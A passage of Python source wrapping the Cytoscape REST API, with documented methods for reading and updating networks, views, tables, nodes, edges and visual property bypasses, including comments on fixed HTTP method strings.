    :returns: 204: Group expanded; 500: Failed to expand group
    """
    endpoint = '{0}networks/{1}/groups/{2}/expand'.format(
        self.___url, networkId, groupNodeId)
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def getNetworkViewCount(self, networkId, verbose=None):
    """Return how many Network Views exist for network `networkId`.

    Cytoscape can hold several views per network model, though the GUI only
    exposes the first one.

    :param networkId: SUID of the Network
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{0}networks/{1}/views/count'.format(self.___url, networkId)
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def getFirstImageAsPdf(self, networkId, h, verbose=None):
    """Return a PDF rendering of the first view of network `networkId`.

    Default size is 600 px.

    :param networkId: SUID of the Network
    :param h: Height of the image; width is set automatically -- Not required, can be None
    :param verbose: print more
    :returns: 200: PDF image stream.
    """
    endpoint = '{0}networks/{1}/views/first.pdf'.format(self.___url, networkId)
    return api(url=endpoint, PARAMS={'h': h}, method="GET",
               verbose=verbose, parse_params=False)
def updateView(self, networkId, viewId, objectType, objectId, bypass, body, verbose=None):
    """Update Visual Properties of one object in a Network View.

    Example Visual Property entries::

        {"visualProperty": "NODE_BORDER_WIDTH", "value": 2}
        {"visualProperty": "EDGE_TRANSPARENCY", "value": 170}
        {"visualProperty": "NETWORK_BACKGROUND_PAINT", "value": "#000000"}

    See the Basic Visual Lexicon JavaDoc API for the full catalogue:
    http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html

    The change is temporary unless `bypass` is true: with bypass the values
    override the Visual Style; without it they revert to the style on the
    next view update.

    :param networkId: SUID of the Network
    :param viewId: SUID of the Network View
    :param objectType: Type of Object
    :param objectId: SUID of the Object
    :param bypass: Bypass the Visual Style with these Visual Properties -- Not required, can be None
    :param body: A list of Visual Properties and their values.
    :param verbose: print more
    :returns: default: successful operation
    """
    endpoint = '{0}networks/{1}/views/{2}/{3}/{4}'.format(
        self.___url, networkId, viewId, objectType, objectId)
    return api(url=endpoint, method="PUT", body=body, verbose=verbose)
def getView(self, networkId, viewId, objectType, objectId, verbose=None):
    """List the Visual Properties of one object in a Network View.

    See the Basic Visual Lexicon JavaDoc API for common properties:
    http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html

    :param networkId: SUID of the Network
    :param viewId: SUID of the Network View
    :param objectType: Type of Object
    :param objectId: SUID of the Object
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{0}networks/{1}/views/{2}/{3}/{4}'.format(
        self.___url, networkId, viewId, objectType, objectId)
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def getTableAsCsv(self, networkId, tableType, verbose=None):
    """Return a CSV dump of one table of network `networkId`.

    Column names occupy the first row.

    :param networkId: SUID of the network containing the table
    :param tableType: Table type
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{0}networks/{1}/tables/{2}.csv'.format(
        self.___url, networkId, tableType)
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def getNeighbours(self, networkId, nodeId, verbose=None):
    """Return the SUIDs of the neighbors of node `nodeId`.

    :param networkId: SUID of the network containing the node.
    :param nodeId: SUID of the node
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{0}networks/{1}/nodes/{2}/neighbors'.format(
        self.___url, networkId, nodeId)
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def putNetworkVisualPropBypass(self, networkId, viewId, visualProperty, body, verbose=None):
    """Bypass the Visual Style of the network with one Visual Property value.

    See the Basic Visual Lexicon JavaDoc API for common properties:
    http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html

    :param networkId: SUID of the Network
    :param viewId: SUID of the Network View
    :param visualProperty: Name of the Visual Property
    :param body: A Visual Property and its value.
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{0}networks/{1}/views/{2}/network/{3}/bypass'.format(
        self.___url, networkId, viewId, visualProperty)
    return api(url=endpoint, method="PUT", body=body, verbose=verbose)
def deleteNetworkVisualProp(self, networkId, viewId, visualProperty, verbose=None):
    """Delete a bypass Visual Property; the Visual Style takes over again.

    See the Basic Visual Lexicon JavaDoc API for common properties:
    http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html

    :param networkId: SUID of the Network
    :param viewId: SUID of the Network View
    :param visualProperty: Name of the Visual Property
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{0}networks/{1}/views/{2}/network/{3}/bypass'.format(
        self.___url, networkId, viewId, visualProperty)
    return api(url=endpoint, method="DELETE", verbose=verbose)
def getNetworkVisualPropBypass(self, networkId, viewId, visualProperty, verbose=None):
    """Return the bypass value currently overriding the Visual Style.

    See the Basic Visual Lexicon JavaDoc API for common properties:
    http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html

    :param networkId: SUID of the Network
    :param viewId: SUID of the Network View
    :param visualProperty: Name of the Visual Property
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{0}networks/{1}/views/{2}/network/{3}/bypass'.format(
        self.___url, networkId, viewId, visualProperty)
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def setCurrentNetwork(self, body, verbose=None):
    """Make the given network current.

    :param body: SUID of the Network -- Not required, can be None
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{0}networks/currentNetwork'.format(self.___url)
    return api(url=endpoint, method="PUT", body=body, verbose=verbose)
def getCurrentNetwork(self, verbose=None):
    """Return the current network.

    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{0}networks/currentNetwork'.format(self.___url)
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def getNetworkVisualProp(self, networkId, viewId, visualProperty, verbose=None):
    """Return one network-level Visual Property of a Network View.

    See the Basic Visual Lexicon JavaDoc API for common properties:
    http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html

    :param networkId: SUID of the Network
    :param viewId: SUID of the Network View
    :param visualProperty: Name of the Visual Property
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{0}networks/{1}/views/{2}/network/{3}'.format(
        self.___url, networkId, viewId, visualProperty)
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def createNetworkFromSelected(self, networkId, title, verbose=None):
    """
    Create a new sub-network from the current selection, named by `title`.
    The response carries the SUID of the newly created sub-network.

    :param networkId: SUID of the network containing the selected nodes and edges
    :param title: Name for the new sub-network -- Not required, can be None
    :param verbose: print more
    :returns: 200: successful operation
    """
    params = set_param(['networkId', 'title'], [networkId, title])
    endpoint = '{}networks/{}'.format(self.___url, networkId)
    return api(url=endpoint, PARAMS=params, method="POST", verbose=verbose)
def deleteNetwork(self, networkId, verbose=None):
    """
    Remove the network identified by `networkId` from the session.

    :param networkId: SUID of the network to delete
    :param verbose: print more
    :returns: default: successful operation
    """
    endpoint = '{}networks/{}'.format(self.___url, networkId)
    return api(url=endpoint, method="DELETE", verbose=verbose)
def getNetwork(self, networkId, verbose=None):
    """
    Returns the Network specified by the `networkId` parameter with all
    associated tables in
    [Cytoscape.js](http://manual.cytoscape.org/en/stable/Supported_Network_File_Formats.html#cytoscape-js-json)
    format.

    :param networkId: SUID of the Network
    :param verbose: print more
    :returns: 200: successful operation
    """
    # Fix: the generated method string was "H", which is not a valid HTTP
    # method; sibling read-only endpoints use "GET".
    response = api(url=self.___url + 'networks/' + str(networkId) + '', method="GET", verbose=verbose, parse_params=False)
    return response
def updateTable(self, networkId, tableType, body, class_, verbose=None):
    """
    Updates the table specified by the `tableType` and `networkId` parameters.
    New columns will be created if they do not exist in the target table.

    Current limitations:
    * Numbers are handled as Double
    * List column is not supported in this version

    :param networkId: SUID containing the table
    :param tableType: Type of table
    :param body: The data with which to update the table.
    :param class_: None -- Not required, can be None
    :param verbose: print more
    :returns: default: successful operation
    """
    # Fix: `class_` was accepted but silently dropped; forward it as the
    # `class` query parameter (set_param omits it when None, preserving the
    # previous behavior for existing callers).
    PARAMS = set_param(['class'], [class_])
    response = api(url=self.___url + 'networks/' + str(networkId) + '/tables/' + str(tableType) + '', PARAMS=PARAMS, method="PUT", body=body, verbose=verbose)
    return response
def getTable(self, networkId, tableType, verbose=None):
    """
    Returns the table specified by the `networkId` and `tableType` parameters.

    :param networkId: SUID of the network containing the table
    :param tableType: Table type
    :param verbose: print more
    :returns: 200: successful operation
    """
    # Fix: method was "H" (invalid HTTP verb); this is a read endpoint, so GET.
    response = api(url=self.___url + 'networks/' + str(networkId) + '/tables/' + str(tableType) + '', method="GET", verbose=verbose, parse_params=False)
    return response
def getSingleVisualPropertyValue(self, networkId, viewId, objectType, objectId, visualProperty, verbose=None):
    """
    Gets the Visual Property specified by the `visualProperty` parameter for
    the node or edge specified by the `objectId` parameter in the Network View
    specified by the `viewId` and `networkId` parameters.

    Additional details on common Visual Properties can be found in the
    [Basic Visual Lexicon JavaDoc API](http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html)

    :param networkId: SUID of the Network
    :param viewId: SUID of the Network View
    :param objectType: Type of Object
    :param objectId: SUID of the Object
    :param visualProperty: Name of the Visual Property
    :param verbose: print more
    :returns: 200: successful operation
    """
    # Fix: method was "H" (invalid HTTP verb); this is a read endpoint, so GET.
    response = api(url=self.___url + 'networks/' + str(networkId) + '/views/' + str(viewId) + '/' + str(objectType) + '/' + str(objectId) + '/' + str(visualProperty) + '', method="GET", verbose=verbose, parse_params=False)
    return response
def updateViews(self, networkId, viewId, objectType, bypass, body, verbose=None):
    """
    Updates multiple node or edge Visual Properties as defined by the
    `objectType` parameter, in the Network View specified by the `viewId` and
    `networkId` parameters.

    Example of a Visual Property:
    ```
    {
        "visualProperty": "NODE_BORDER_WIDTH",
        "value": 2
    }
    ```

    Additional details on common Visual Properties can be found in the
    [Basic Visual Lexicon JavaDoc API](http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html)

    Note that this sets the Visual Properties temporarily unless the `bypass`
    parameter is set to `true`. If the `bypass` parameter is set to `true`,
    the Visual Style will be overridden by these Visual Property values. If
    the `bypass` parameter is not used or is set to `false`, any Visual
    Properties set will return to those defined in the Visual Style if the
    Network View is updated.

    :param networkId: SUID of the Network
    :param viewId: SUID of the Network View
    :param objectType: Type of Object
    :param bypass: Bypass the Visual Style with these Visual Properties -- Not required, can be None
    :param body: A list of Objects with Visual Properties.
    :param verbose: print more
    :returns: default: successful operation
    """
    # Fix: `bypass` was accepted but never sent; forward it as a query
    # parameter (set_param drops it when None, so existing callers that leave
    # it unset see no change in behavior).
    PARAMS = set_param(['bypass'], [bypass])
    response = api(url=self.___url + 'networks/' + str(networkId) + '/views/' + str(viewId) + '/' + str(objectType) + '', PARAMS=PARAMS, method="PUT", body=body, verbose=verbose)
    return response
def getViews(self, networkId, viewId, objectType, visualProperty, verbose=None):
    """
    Returns a list of all Visual Property values for the Visual Property
    specified by the `visualProperty` and `objectType` parameters, in the
    Network View specified by the `viewId` and `networkId` parameters.

    Additional details on common Visual Properties can be found in the
    [Basic Visual Lexicon JavaDoc API](http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html)

    :param networkId: SUID of the Network
    :param viewId: SUID of the Network View
    :param objectType: Type of Object
    :param visualProperty: Name of the Visual Property -- Not required, can be None
    :param verbose: print more
    :returns: 200: successful operation
    """
    # Fix: method was "H" (invalid HTTP verb); this is a read endpoint, so GET.
    response = api(url=self.___url + 'networks/' + str(networkId) + '/views/' + str(viewId) + '/' + str(objectType) + '', PARAMS={'visualProperty':visualProperty}, method="GET", verbose=verbose, parse_params=False)
    return response
def getTableAsTsv(self, networkId, tableType, verbose=None):
    """
    Returns a TSV (tab delimited text) representation of the table specified
    by the `networkId` and `tableType` parameters. All column names are
    included in the first row.

    :param networkId: SUID of the network containing the table
    :param tableType: Table type
    :param verbose: print more
    :returns: 200: successful operation
    """
    # Fix: method was "G" (truncated); this is a read endpoint, so GET.
    response = api(url=self.___url + 'networks/' + str(networkId) + '/tables/' + str(tableType) + '.tsv', method="GET", verbose=verbose, parse_params=False)
    return response
def getNetworkViewAsCx(self, networkId, viewId, verbose=None):
    """
    Returns the Network View specified by the `viewId` and `networkId`
    parameters in
    [CX format](http://manual.cytoscape.org/en/stable/Supported_Network_File_Formats.html#cytoscape-cx)

    :param networkId: SUID of the Network
    :param viewId: SUID of the Network View
    :param verbose: print more
    :returns: default: successful operation
    """
    # Fix: method was "G" (truncated); this is a read endpoint, so GET.
    response = api(url=self.___url + 'networks/' + str(networkId) + '/views/' + str(viewId) + '.cx', method="GET", verbose=verbose, parse_params=False)
    return response
def getImageAsPdf(self, networkId, viewId, verbose=None):
    """
    Returns a PDF of the Network View specified by the `viewId` and
    `networkId` parameters.

    Default size is 500 px.

    :param networkId: SUID of the Network
    :param viewId: SUID of the Network View
    :param verbose: print more
    :returns: 200: PDF image stream.
    """
    # Fix: method was "G" (truncated); this is a read endpoint, so GET.
    response = api(url=self.___url + 'networks/' + str(networkId) + '/views/' + str(viewId) + '.pdf', method="GET", verbose=verbose, parse_params=False)
    return response
def getNetworkPointer(self, networkId, nodeId, verbose=None):
    """
    Fetch the SUID of the nested network associated with the given node, if
    the node specified by `nodeId` and `networkId` has one.

    :param networkId: SUID of the network containing the node
    :param nodeId: SUID of the node
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{}networks/{}/nodes/{}/pointer'.format(self.___url, networkId, nodeId)
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def getTables(self, networkId, verbose=None):
    """
    Fetch every table belonging to the network identified by `networkId`.

    :param networkId: SUID of the Network
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{}networks/{}/tables'.format(self.___url, networkId)
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def updateColumnName(self, networkId, tableType, body, verbose=None):
    """
    Rename an existing column in the table selected by `tableType` and
    `networkId`.

    :param networkId: SUID of the network containing the table
    :param tableType: Table Type
    :param body: Old and new column name
    :param verbose: print more
    :returns: default: successful operation
    """
    endpoint = '{}networks/{}/tables/{}/columns'.format(self.___url, networkId, tableType)
    return api(url=endpoint, method="PUT", body=body, verbose=verbose)
def createColumn(self, networkId, tableType, body, verbose=None):
    """
    Create a new, empty column in the table selected by `tableType` within
    the network selected by `networkId`. An array of column definitions may
    be supplied to create several columns at once.

    :param networkId: SUID of the Network
    :param tableType: Table Type
    :param body: New Column Info
    :param verbose: print more
    :returns: 201: Column(s) createed; 412: Could not process column JSON
    """
    params = set_param(['networkId', 'tableType', 'body'], [networkId, tableType, body])
    endpoint = '{}networks/{}/tables/{}/columns'.format(self.___url, networkId, tableType)
    return api(url=endpoint, PARAMS=params, method="POST", verbose=verbose)
def getColumnNames(self, networkId, tableType, verbose=None):
    """
    Fetch all columns of the table selected by `networkId` and `tableType`.

    :param networkId: SUID of the network containing the table
    :param tableType: Table Type
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{}networks/{}/tables/{}/columns'.format(self.___url, networkId, tableType)
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def getRow(self, networkId, tableType, primaryKey, verbose=None):
    """
    Fetch the row whose key matches `primaryKey` from the table selected by
    `tableType` and `networkId`. Data is represented by column names and
    their values.

    ```json
    {
        "name": "Hodor 1",
        "value": 0.11,
        "matched": false
        ...
    }
    ```

    :param networkId: SUID of the network containing the table
    :param tableType: Table type
    :param primaryKey: Primary key of the row Object, normally an SUID
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{}networks/{}/tables/{}/rows/{}'.format(
        self.___url, networkId, tableType, primaryKey)
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def getEdgeDirected(self, networkId, edgeId, verbose=None):
    """
    Report whether the edge selected by `edgeId` and `networkId` is directed
    (response body is `true` when it is).

    :param networkId: SUID of the network containing the edge
    :param edgeId: SUID of the edge
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{}networks/{}/edges/{}/isDirected'.format(self.___url, networkId, edgeId)
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def getNetworkCount(self, verbose=None):
    """
    Count the networks in the current Cytoscape session.

    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = self.___url + 'networks/count'
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def getNetworkView(self, networkId, viewId, file, verbose=None):
    """
    Fetch the Network View selected by `viewId` and `networkId`.

    If the `file` parameter is left unspecified, the response will contain
    data in [Cytoscape.js](http://manual.cytoscape.org/en/stable/Supported_Network_File_Formats.html#cytoscape-js-json)
    format. If the `file` parameter is specified, the Network View will be
    written to a file, and the response will contain the location of the file
    in the following format:
    ```
    {
        "file": "/media/HD1/myFiles/networkView.sif"
    }
    ```
    The format of the output file is defined by the extension of the `file`
    parameter.

    :param networkId: SUID of the Network
    :param viewId: SUID of the Network View
    :param file: A path to a file relative to the current directory. The
        format of the file written is defined by the file extension
        (.cys, .xml/.xgmml, .nnf, .sif, .cyjs). -- Not required, can be None
    :param verbose: print more
    :returns: default: successful operation
    """
    query = {'file': file}
    endpoint = '{}networks/{}/views/{}'.format(self.___url, networkId, viewId)
    return api(url=endpoint, PARAMS=query, method="GET", verbose=verbose, parse_params=False)
def putSingleVisualPropertyValueBypass(self, networkId, viewId, objectType, objectId, visualProperty, body, verbose=None):
    """
    Bypass the Visual Style for a single object: the Visual Property in the
    message body is used instead of the definition provided by the Visual
    Style for the object selected by `objectId` and `objectType`, in the
    Network View selected by `viewId` and `networkId`.

    Example of a Visual Property:
    ```
    {
        "visualProperty": "NODE_BORDER_WIDTH",
        "value": 2
    }
    ```

    Additional details on common Visual Properties can be found in the
    [Basic Visual Lexicon JavaDoc API](http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html)

    :param networkId: Network SUID
    :param viewId: Network View SUID
    :param objectType: Type of Object
    :param objectId: SUID of the Object
    :param visualProperty: Name of the Visual Property
    :param body: A Visual Property and its value.
    :param verbose: print more
    :returns: default: successful operation
    """
    endpoint = '{}networks/{}/views/{}/{}/{}/{}/bypass'.format(
        self.___url, networkId, viewId, objectType, objectId, visualProperty)
    return api(url=endpoint, method="PUT", body=body, verbose=verbose)
def deleteSingleVisualPropertyValueBypass(self, networkId, viewId, objectType, objectId, visualProperty, verbose=None):
    """
    Remove the bypass Visual Property named by `visualProperty` from the
    object selected by `objectId` and `objectType` in the Network View
    selected by `viewId` and `networkId`. Afterwards the Visual Property is
    again defined by the Visual Style.

    Additional details on common Visual Properties can be found in the
    [Basic Visual Lexicon JavaDoc API](http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html)

    :param networkId: SUID of the Network
    :param viewId: SUID of the Network View
    :param objectType: Type of Object
    :param objectId: SUID of Object
    :param visualProperty: Name of the Visual Property
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{}networks/{}/views/{}/{}/{}/{}/bypass'.format(
        self.___url, networkId, viewId, objectType, objectId, visualProperty)
    return api(url=endpoint, method="DELETE", verbose=verbose)
def getSingleVisualPropertyValueBypass(self, networkId, viewId, objectType, objectId, visualProperty, verbose=None):
    """
    Fetch the bypass Visual Property named by `visualProperty` for the object
    selected by `objectId` and `objectType` in the Network View selected by
    `viewId` and `networkId`. The response is the Visual Property used in
    place of the definition provided by the Visual Style.

    Additional details on common Visual Properties can be found in the
    [Basic Visual Lexicon JavaDoc API](http://chianti.ucsd.edu/cytoscape-3.6.1/API/org/cytoscape/view/presentation/property/BasicVisualLexicon.html)

    :param networkId: Network SUID
    :param viewId: Network View SUID
    :param objectType: Type of Object
    :param objectId: SUID of the Object
    :param visualProperty: Name of the Visual Property
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{}networks/{}/views/{}/{}/{}/{}/bypass'.format(
        self.___url, networkId, viewId, objectType, objectId, visualProperty)
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def deleteNode(self, networkId, nodeId, verbose=None):
    """
    Remove the node selected by `nodeId` from the network selected by
    `networkId`.

    :param networkId: SUID of the network containing the node.
    :param nodeId: SUID of the node
    :param verbose: print more
    :returns: default: successful operation
    """
    endpoint = '{}networks/{}/nodes/{}'.format(self.___url, networkId, nodeId)
    return api(url=endpoint, method="DELETE", verbose=verbose)
def getNode(self, networkId, nodeId, verbose=None):
    """
    Fetch a node together with its associated row data.

    :param networkId: SUID of the network containing the node
    :param nodeId: SUID of the node
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{}networks/{}/nodes/{}'.format(self.___url, networkId, nodeId)
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def createEdge(self, networkId, body, verbose=None):
    """
    Add new edge(s) to the network. The body should include an array of new
    node names. The response is an array of objects with fields identifying
    the SUIDs of the new edges along with source and target SUIDs.

    :param networkId: SUID of the network to add edges to.
    :param body: Array of new edges
    :param verbose: print more
    :returns: 200: successful operation
    """
    params = set_param(['networkId', 'body'], [networkId, body])
    endpoint = '{}networks/{}/edges'.format(self.___url, networkId)
    return api(url=endpoint, PARAMS=params, method="POST", verbose=verbose)
def deleteAllEdges(self, networkId, verbose=None):
    """
    Remove every edge from the network selected by `networkId`.

    :param networkId: SUID of the network to delete edges from
    :param verbose: print more
    :returns: default: successful operation
    """
    endpoint = '{}networks/{}/edges'.format(self.___url, networkId)
    return api(url=endpoint, method="DELETE", verbose=verbose)
def getEdges(self, networkId, column, query, verbose=None):
    """
    List all edges of the network selected by `networkId` as SUIDs.

    When both `column` and `query` are given, results are limited to rows of
    the edge table where the value in `column` matches `query`.

    :param networkId: SUID of the network containing the edges
    :param column: The name of the column that will be queried for matches. -- Not required, can be None
    :param query: The value to be matched. -- Not required, can be None
    :param verbose: print more
    :returns: 200: successful operation
    """
    filters = {'column': column, 'query': query}
    endpoint = '{}networks/{}/edges'.format(self.___url, networkId)
    return api(url=endpoint, PARAMS=filters, method="GET", verbose=verbose, parse_params=False)
def setSelectedEdges(self, networkId, body, verbose=None):
    """
    Mark as selected the edges given in the body within the network selected
    by `networkId`. The response lists the selected SUIDs.

    :param networkId: SUID of the network containing the edges
    :param body: Array of edge SUIDs to select -- Not required, can be None
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{}networks/{}/edges/selected'.format(self.___url, networkId)
    return api(url=endpoint, method="PUT", body=body, verbose=verbose)
def getSelectedEdges(self, networkId, verbose=None):
    """
    Fetch the selected edges of the network selected by `networkId`, as a
    list of SUIDs.

    :param networkId: SUID of the network containing the edges
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{}networks/{}/edges/selected'.format(self.___url, networkId)
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def getFirstImageAsPng(self, networkId, h, verbose=None):
    """
    Render the first available Network View of the network selected by
    `networkId` as a PNG image. Default size is 600 px.

    Example usage:
        from IPython.display import Image
        fig=cytoscape.networks.getFirstImageAsPng(networkId=cytoscape.network.get()["SUID"],h=None)
        with open('my_image.png', 'wb') as file:
            file.write(fig.content)
        Image(fig.content)

    :param networkId: SUID of the Network
    :param h: Height of the image. Width is set automatically -- Not required, can be None
    :param verbose: print more
    :returns: 200: PNG image stream.
    """
    endpoint = '{}networks/{}/views/first.png'.format(self.___url, networkId)
    return api(url=endpoint, PARAMS={'h': h}, method="GET", verbose=verbose, parse_params=False)
def getCell(self, networkId, tableType, primaryKey, columnName, verbose=None):
    """
    Fetch the value of one cell, addressed by `primaryKey` and `columnName`,
    in the table selected by `tableType` and `networkId`. The response is a
    JSON representation of a String, Boolean, Number, or List.

    :param networkId: SUID of the network containing the table
    :param tableType: Table type
    :param primaryKey: Primary key of the row Object, normally an SUID
    :param columnName: Name of the Column
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{}networks/{}/tables/{}/rows/{}/{}'.format(
        self.___url, networkId, tableType, primaryKey, columnName)
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def setSelectedNodes(self, networkId, body, verbose=None):
    """
    Mark as selected the nodes given in the body within the network selected
    by `networkId`. The response lists the selected SUIDs.

    :param networkId: SUID of the network containing the nodes
    :param body: Array of node SUIDs to select -- Not required, can be None
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{}networks/{}/nodes/selected'.format(self.___url, networkId)
    return api(url=endpoint, method="PUT", body=body, verbose=verbose)
def getSelectedNodes(self, networkId, verbose=None):
    """
    Fetch the selected nodes of the network selected by `networkId`, as a
    list of SUIDs.

    :param networkId: SUID of the network containing the nodes
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{}networks/{}/nodes/selected'.format(self.___url, networkId)
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def deleteGroup(self, networkId, groupNodeId, verbose=None):
    """
    Remove the group selected by `groupNodeId` and `networkId`. The nodes and
    edges the group contained remain present in the network; only the node
    used to identify the Group is deleted.

    :param networkId: SUID of the Network
    :param groupNodeId: SUID of the Node representing the Group
    :param verbose: print more
    :returns: default: successful operation
    """
    endpoint = '{}networks/{}/groups/{}'.format(self.___url, networkId, groupNodeId)
    return api(url=endpoint, method="DELETE", verbose=verbose)
def getGroup(self, networkId, groupNodeId, verbose=None):
    """
    Fetch the group selected by `groupNodeId` and `networkId`.

    :param networkId: SUID of the Network
    :param groupNodeId: SUID of the Node representing the Group
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{}networks/{}/groups/{}'.format(self.___url, networkId, groupNodeId)
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def getEdgeCount(self, networkId, verbose=None):
    """
    Count the edges in the network selected by `networkId`.

    :param networkId: SUID of the network containing the edges
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{}networks/{}/edges/count'.format(self.___url, networkId)
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def updateColumnValues(self, networkId, tableType, columnName, default, body, verbose=None):
    """
    Sets the values for cells in the table specified by the `tableType` and
    `networkId` parameters.

    If the `default` parameter is not specified, the message body should
    consist of key-value pairs with which to set values.
    If the `default` parameter is specified, its value will be used for every
    cell in the column. This is useful to set columns like "selected."

    :param networkId: SUID of the network containing the table
    :param tableType: The type of table
    :param columnName: Name of the column in which to set values
    :param default: Default Value. If this value is provided, all cells will be set to this. -- Not required, can be None
    :param body: Array of SUID Keyed values
    :param verbose: print more
    :returns: default: successful operation
    """
    # Fix: `default` was accepted but never sent, so the "set every cell"
    # mode documented above could never work; forward it as a query
    # parameter (set_param omits it when None, keeping the old behavior for
    # callers that don't use it).
    PARAMS = set_param(['default'], [default])
    response = api(url=self.___url + 'networks/' + str(networkId) + '/tables/' + str(tableType) + '/columns/' + str(columnName) + '', PARAMS=PARAMS, method="PUT", body=body, verbose=verbose)
    return response
def deleteColumn(self, networkId, tableType, columnName, verbose=None):
    """
    Remove the column named by `columnName` from the table selected by
    `tableType` and `networkId`.

    :param networkId: SUID of the network containing the table from which to delete the column
    :param tableType: Table Type from which to delete the column
    :param columnName: Name of the column to delete
    :param verbose: print more
    :returns: default: successful operation
    """
    endpoint = '{}networks/{}/tables/{}/columns/{}'.format(
        self.___url, networkId, tableType, columnName)
    return api(url=endpoint, method="DELETE", verbose=verbose)
def getColumnValues(self, networkId, tableType, columnName, verbose=None):
    """
    Fetch all values of the column named by `columnName` in the table
    selected by `networkId` and `tableType`.

    :param networkId: SUID of the Network
    :param tableType: Type of Table
    :param columnName: Name of the Column
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = '{}networks/{}/tables/{}/columns/{}'.format(
        self.___url, networkId, tableType, columnName)
    return api(url=endpoint, method="GET", verbose=verbose, parse_params=False)
def createNode(self, networkId, body, verbose=None):
    """
    Add new nodes to the network selected by `networkId`. The `name` column
    is populated from the contents of the message body.

    :param networkId: SUID of the network containing the node.
    :param body: Array of new node names
    :param verbose: print more
    :returns: 201: ; 412:
    """
    params = set_param(['networkId', 'body'], [networkId, body])
    endpoint = '{}networks/{}/nodes'.format(self.___url, networkId)
    return api(url=endpoint, PARAMS=params, method="POST", verbose=verbose)
def deleteAllNodes(self, networkId, verbose=None):
    """
    Remove every node from the network selected by `networkId`.

    :param networkId: SUID of the network to delete nodes from
    :param verbose: print more
    :returns: default: successful operation
    """
    endpoint = '{}networks/{}/nodes'.format(self.___url, networkId)
    return api(url=endpoint, method="DELETE", verbose=verbose)
def getNodes(self, networkId, column, query, verbose=None):
    """
    List all nodes of the network selected by `networkId` as SUIDs.

    When both `column` and `query` are given, results are limited to rows of
    the node table where the value in `column` matches `query`.

    :param networkId: SUID of the network containing the nodes
    :param column: The name of the column that will be queried for matches. -- Not required, can be None
    :param query: The value to be matched. -- Not required, can be None
    :param verbose: print more
    :returns: 200: successful operation
    """
    filters = {'column': column, 'query': query}
    endpoint = '{}networks/{}/nodes'.format(self.___url, networkId)
    return api(url=endpoint, PARAMS=filters, method="GET", verbose=verbose, parse_params=False)
def setCurrentNetworkView(self, body, verbose=None):
    """
    Make the given Network View the current one.

    :param body: SUID of the Network View -- Not required, can be None
    :param verbose: print more
    :returns: 200: successful operation
    """
    endpoint = self.___url + 'networks/views/currentNetworkView'
    return api(url=endpoint, method="PUT", body=body, verbose=verbose)
def getCurrentNetworkView(self, verbose=None):
    """
    Fetch the current Network View.

    :param verbose: print more
    :returns: 200: successful operation
    """
